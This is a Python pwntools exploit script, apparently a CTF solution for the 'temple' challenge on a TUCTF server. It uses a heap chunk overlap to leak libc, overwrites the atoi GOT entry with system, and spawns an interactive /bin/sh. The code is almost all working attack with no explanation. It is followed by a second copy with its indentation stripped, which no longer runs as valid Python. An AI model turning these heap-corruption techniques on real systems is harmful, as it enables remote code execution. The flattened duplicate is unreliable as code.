PewZ/temple.py

## temple.py
from pwn import *

# CANARY    : ENABLED
# FORTIFY   : disabled
# NX        : ENABLED
# PIE       : disabled
# RELRO     : Partial
# 0x603188 <templeWisdom>:        0x8 ; number of wisdoms
# 0x6031a0 <temple>:      0x0     0x625040 ; temple
# your scribes start at idx 8

local = False
if local:
    r = process("./temple")
    #context.terminal = [ "tmux", "splitw" ]
    #gdb.attach(r, """
	#	b *0x000000000040167D
    #    c
    #""")
else:
    #r = remote("guestbook.tuctf.com", 4545)
    r = remote("temple.tuctf.com", 4343)


def take(idx):
    r.recvuntil("Your choice: ")
    r.sendline("1")
    r.recvuntil("seek?: ")
    r.sendline(str(idx))

def give(size, data):
    r.recvuntil("Your choice: ")
    r.sendline("2")
    r.recvuntil("hold?: ")
    r.sendline(str(size))
    r.recvuntil("wisdom?: ")
    r.send(data)

def modify(idx, data):
    r.recvuntil("Your choice: ")
    r.sendline("3")
    r.recvuntil("rethink?: ")
    r.sendline(str(idx))
    r.recvuntil("differently?: ")
    r.send(data)

give(32, "A"*31 + "\n")
give(32, "B"*31 + "\n")
give(32, "C"*31 + "\n")

# clear in-use bit of first chunk
modify(8, "A"*32 + "\x30")
# free chunk 2 to coalesce with first chunk
take(9)

give(32, "D"*31 + "\n")

# 11 and text of 8 overlaps
modify(8, p64(8) + p64(0x0) + p64(8) + p64(0x603018) + "\n")
take(11)

r.recvuntil(" - ")
leak = bytearray()
while len(leak) != 6:
    leak.append(r.recv(1))

leak = u64(leak.ljust(8, "\x00"))
#libc_base = leak - 0x68f90
libc_base = leak - 0x000000000006b990

log.success("leak: 0x{:012x}".format(leak))
log.success("libc base: 0x{:012x}".format(libc_base))

system = libc_base + 0x000000000003f480
system = libc_base + 0x0003e3e0
system = libc_base + 0x0000000000041490
log.success("system: 0x{:012x}".format(system))
#bin_sh = libc_base + 0x1619b9
#log.success("/bin/sh: 0x{:012x}".format(bin_sh))

give(32, "A"*31 + "\n") # 12
give(32, "B"*31 + "\n") # 13
give(32, "C"*31 + "\n") # 14
give(32, "D"*31 + "\n") # 15
give(32, "E"*31 + "\n") # 16
give(32, "F"*31 + "\n") # 17

# clear in-use bit of first chunk
modify(14, "A"*32 + "\x30")
# free chunk 2 to coalesce with first chunk
take(15)

give(32, "G"*31 + "\n")

atoi_got = 0x603098
# 18 and text of 14 overlaps
modify(14, p64(8) + p64(atoi_got) + p64(8) + p64(0x603018) + "\n")
modify(18, p64(system))
#take(15)

r.sendline("/bin/sh;")
r.interactive()
	from pwn import *

	# CANARY : ENABLED
	# FORTIFY : disabled
	# NX : ENABLED
	# PIE : disabled
	# RELRO : Partial
	# 0x603188 <templeWisdom>: 0x8 ; number of wisdoms
	# 0x6031a0 <temple>: 0x0 0x625040 ; temple
	# your scribes start at idx 8

	local = False
	if local:
	r = process("./temple")
	#context.terminal = [ "tmux", "splitw" ]
	#gdb.attach(r, """
	# b *0x000000000040167D
	# c
	#""")
	else:
	#r = remote("guestbook.tuctf.com", 4545)
	r = remote("temple.tuctf.com", 4343)


	def take(idx):
	r.recvuntil("Your choice: ")
	r.sendline("1")
	r.recvuntil("seek?: ")
	r.sendline(str(idx))

	def give(size, data):
	r.recvuntil("Your choice: ")
	r.sendline("2")
	r.recvuntil("hold?: ")
	r.sendline(str(size))
	r.recvuntil("wisdom?: ")
	r.send(data)

	def modify(idx, data):
	r.recvuntil("Your choice: ")
	r.sendline("3")
	r.recvuntil("rethink?: ")
	r.sendline(str(idx))
	r.recvuntil("differently?: ")
	r.send(data)

	give(32, "A"*31 + "\n")
	give(32, "B"*31 + "\n")
	give(32, "C"*31 + "\n")

	# clear in-use bit of first chunk
	modify(8, "A"*32 + "\x30")
	# free chunk 2 to coalesce with first chunk
	take(9)

	give(32, "D"*31 + "\n")

	# 11 and text of 8 overlaps
	modify(8, p64(8) + p64(0x0) + p64(8) + p64(0x603018) + "\n")
	take(11)

	r.recvuntil(" - ")
	leak = bytearray()
	while len(leak) != 6:
	leak.append(r.recv(1))

	leak = u64(leak.ljust(8, "\x00"))
	#libc_base = leak - 0x68f90
	libc_base = leak - 0x000000000006b990

	log.success("leak: 0x{:012x}".format(leak))
	log.success("libc base: 0x{:012x}".format(libc_base))

	system = libc_base + 0x000000000003f480
	system = libc_base + 0x0003e3e0
	system = libc_base + 0x0000000000041490
	log.success("system: 0x{:012x}".format(system))
	#bin_sh = libc_base + 0x1619b9
	#log.success("/bin/sh: 0x{:012x}".format(bin_sh))

	give(32, "A"*31 + "\n") # 12
	give(32, "B"*31 + "\n") # 13
	give(32, "C"*31 + "\n") # 14
	give(32, "D"*31 + "\n") # 15
	give(32, "E"*31 + "\n") # 16
	give(32, "F"*31 + "\n") # 17

	# clear in-use bit of first chunk
	modify(14, "A"*32 + "\x30")
	# free chunk 2 to coalesce with first chunk
	take(15)

	give(32, "G"*31 + "\n")

	atoi_got = 0x603098
	# 18 and text of 14 overlaps
	modify(14, p64(8) + p64(atoi_got) + p64(8) + p64(0x603018) + "\n")
	modify(18, p64(system))
	#take(15)

	r.sendline("/bin/sh;")
	r.interactive()